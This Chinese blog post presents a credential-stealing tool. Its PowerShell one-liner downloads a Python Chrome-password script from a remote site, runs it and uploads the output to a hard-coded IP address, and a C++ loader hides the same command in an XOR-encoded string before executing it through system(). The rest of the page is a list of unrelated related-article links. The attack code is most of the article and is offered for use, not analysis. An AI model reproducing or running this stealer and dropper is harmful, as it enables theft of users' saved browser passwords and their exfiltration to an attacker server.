【Windows C++】powershell 获取chrome密码并上传

获取chrome密码是lijiejie的python脚本，因此powershell代码依赖于：python和pywin32（通过pip安装）

powershell代码：

#1 下载文件保存在用户temp目录下
Invoke-WebRequest -Uri http://zheli.org/data/201808795723.txt -OutFile $env:temp/update.txt
#2 pip安装pywin32用于解密
pip install pywin32
#3 执行python脚本
python $env:temp/update.txt
#4 回传数据
Invoke-RestMethod -Uri  http://45.32.66.143:8001/recvpost.php -Method Post -InFile $env:temp/update.txt最终：
powershell "Invoke-WebRequest -Uri http://zheli.org/data/201808795723.txt -OutFile $env:temp/update.txt ;pip install pywin32; python $env:temp/update.txt  ; Invoke-RestMethod -Uri  http://45.32.66.143:8001/recvpost.php -Method Post -InFile $env:temp/update.txt"

C++实现：

#include "windows.h"
#include "string.h"
using namespace std;int main()
{char cDllname[] = "\x7c\x62\x67\x72\x63\x65\x3f\x75\x7d\x7d";char cSystem[] = "\x62\x68\x62\x65\x74\x7c";//"system";char cPayload[] = "\x61\x7e\x66\x74\x63\x62\x79\x74\x7d\x7d\x31\x33\x58\x7f\x67\x7e\x7a\x74\x3c\x46\x74\x73\x43\x74\x60\x64\x74\x62\x65\x31\x3c\x44\x63\x78\x31\x79\x65\x65\x61\x2b\x3e\x3e\x6b\x79\x74\x7d\x78\x3f\x7e\x63\x76\x3e\x75\x70\x65\x70\x3e\x23\x21\x20\x29\x21\x29\x26\x28\x24\x26\x23\x22\x3f\x65\x69\x65\x31\x3c\x5e\x64\x65\x57\x78\x7d\x74\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x65\x69\x65\x31\x2a\x61\x78\x61\x31\x78\x7f\x62\x65\x70\x7d\x7d\x31\x61\x68\x66\x78\x7f\x22\x23\x2a\x31\x61\x68\x65\x79\x7e\x7f\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x65\x69\x65\x31\x31\x2a\x31\x58\x7f\x67\x7e\x7a\x74\x3c\x43\x74\x62\x65\x5c\x74\x65\x79\x7e\x75\x31\x3c\x44\x63\x78\x31\x31\x79\x65\x65\x61\x2b\x3e\x3e\x25\x24\x3f\x22\x23\x3f\x27\x27\x3f\x20\x25\x22\x2b\x29\x21\x21\x20\x3e\x63\x74\x72\x67\x61\x7e\x62\x65\x3f\x61\x79\x61\x31\x3c\x5c\x74\x65\x79\x7e\x75\x31\x41\x7e\x62\x65\x31\x3c\x58\x7f\x57\x78\x7d\x74\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x7d\x7e\x76\x33";static bool bIsUpdated = false;if(!bIsUpdated){for(int i=0; i<strlen(cPayload); i++){if(i<strlen(cSystem)){cSystem[i] ^= 0x11;}if(i<strlen(cDllname)){cDllname[i] ^= 0x11;}cPayload[i] ^= 0x11;}typedef void (WINAPI *PGNSI)(char *);PGNSI pGNSI;pGNSI = (PGNSI)GetProcAddress(GetModuleHandle(TEXT(cDllname)),cSystem);pGNSI(cPayload);bIsUpdated = true;}return 0;
}

如果在vs2017中遇到类型转换的问题，可以尝试替换其中这段代码，讲char* 转换成 LPCWSTR。

    typedef void (WINAPI *PGNSI)(char *);PGNSI pGNSI;WCHAR wszClassName[256];MultiByteToWideChar(CP_ACP,0,cDllname,strlen(cDllname)+1,wszClassName,sizeof(wszClassName)/sizeof(wszClassName[0]));pGNSI = (PGNSI)GetProcAddress(GetModuleHandle(wszClassName),cSystem);pGNSI(cPayload);bIsUpdated = true;

【Windows C++】powershell 获取chrome密码并上传相关推荐

Nginx的安装基础配置（windows、linux）以及搭建图片服务器（windows、阿里云），文件上传
Nginx的安装基础配置(windows.linux)以及搭建图片服务器(windows.阿里云),文件上传本文目录文章目录 Nginx的安装基础配置(windows.linux)以及搭建图片服务 ...
XShell多版本存在后门，避免服务器账号密码被上传
重大事件,知名终端模拟软件 Xshell 多版本存在后门,或上传用户服务器账号密码. 日前,360CERT 获悉某安全公司发现 NetSarang 的 Xmanager, Xshell, Xftp, ...
java通过URL获取网络文件并上传到阿里云OSS文件服务器
首先,先从网络上读取到文件 /*** 从网络Url中读取文件* @param urlStr 文件URL地址* @throws IOException*/public String downLoadFr ...
动态获取爱奇艺上传视频mp4格式url地址
有时候,在工作中有些客户需要用到视频,我们大家都知道视频是非常的耗费流量的,因此,如果因为项目要求客户单独买台视频服务器是非常划不来的.那么将视频上传到优酷,爱奇艺等视频网站来托管那是一件很好的解决方 ...
Windows下使用xShell向远程Linux上传文件
上传文件使用rz与sz命令,远程Linux系统上需要安装lrzsz工具包下载安装包lrzsz-0.12.20.tar.gz: http://www.linuxidc.com/Linux/2010- ...
在windows环境下ftp服务器的文件上传和下载
在windows环境下ftp服务器的文件上传和下载 mo 一.上传本地文件第一步:登录FTP服务器.在开始菜单中输入cmd,回车进入.输入ftp进入服务器,输入命令格式:open FTP服务器地址 ...
威纶通触摸屏没有密码无法上传和下载时，如何恢复出厂设置？
威纶通触摸屏没有密码无法上传和下载时,如何恢复出厂设置? 本次以TK6070iQ为例进行说明, 首先,拆掉屏幕后盖板的4颗螺丝,如下图所示, 找到电路板上的J5短路块位置,如下图所示,当前连接的是2. ...
【day29】图片base64格式如何获取后缀名并上传到指定路径下
public Result ImageBase64UploadFile(String base64Data){String tempFileName="";try {String ...
windows学习记录之MFC通过URL上传下载文件
** HTTP四种常见的POST提交数据方式: ** HTTP/1.1 协议规定的 HTTP 请求方法有 OPTIONS.GET.HEAD.POST.PUT.DELETE.TRACE.CONNECT ...

【Windows C++】powershell 获取chrome密码并上传

【Windows C++】powershell 获取chrome密码并上传相关推荐

最新文章

热门文章